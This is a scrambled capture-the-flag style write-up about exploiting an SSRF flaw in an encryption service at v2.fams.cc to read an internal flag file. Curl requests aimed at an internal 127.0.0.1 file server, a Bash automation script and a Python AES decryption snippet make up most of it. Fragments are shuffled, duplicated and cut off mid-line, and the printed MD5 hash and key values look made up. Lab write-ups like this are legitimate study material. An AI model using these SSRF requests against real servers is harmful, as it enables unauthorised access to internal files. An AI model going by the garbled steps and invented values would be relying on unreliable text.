V2.fams.cc -

>>> import hashlib >>> hashlib.md5(b'testkey').hexdigest() '3d2e4c5a9b7d1e3f5a6c7d8e9f0a1b2c' The server also generates a random 16‑byte IV and prefixes it to the ciphertext (standard practice). The download URL returns a that is exactly IV || ciphertext . 4. Exploiting the SSRF The url parameter is fetched server‑side without any allow‑list. The backend runs on a Docker container that also hosts an internal file‑server on port 8000 . The file‑server’s directory tree (found via a quick port scan on the internal IP 127.0.0.1 ) looks like this:

# 1️⃣ Ask the service to encrypt the internal flag file RESP=$(curl -s -X POST "$TARGET/encrypt" \ -d "url=$SSRF_URL&key=$KEY") DOWNLOAD=$(echo "$RESP" | jq -r .download) USED_KEY=$(echo "$RESP" | jq -r .used_key)

By abusing the SSRF to read the internal flag file, then using the deterministic encryption routine to decrypt it (the service returns the ciphertext and the key it used), we can recover the flag. 2.1. Basic browsing $ curl -s http://v2.fams.cc Result – a tiny HTML page: v2.fams.cc

# 3️⃣ Decrypt locally (Python one‑liner) python3 - <<PY import sys, binascii from Crypto.Cipher import AES

# Load encrypted file data = open('enc.bin','rb').read() iv, ct = data[:16], data[16:] >>> import hashlib >>> hashlib

#!/usr/bin/env bash TARGET="http://v2.fams.cc" SSRF_URL="http://127.0.0.1:8000/secret/flag.txt" KEY="ssrf"

#!/usr/bin/env python3 import sys, hashlib, binascii from Crypto.Cipher import AES Exploiting the SSRF The url parameter is fetched

# 2️⃣ Pull the encrypted blob curl -s "$DOWNLOAD" -o /tmp/enc.bin

curl -s -X POST http://v2.fams.cc/encrypt \ -d "url=http://127.0.0.1:8000/secret/flag.txt&key=ssrf" \ -o response.json Result ( response.json ):

FLAGv2_faMS_5SRF_3xpl0it_0n_Th3_WeB That is the required flag. For completeness, the whole attack can be automated in a single Bash+Python pipeline:

# Key derived from the "key" we sent ("ssrf") key_hex = '8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e' key = binascii.unhexlify(key_hex)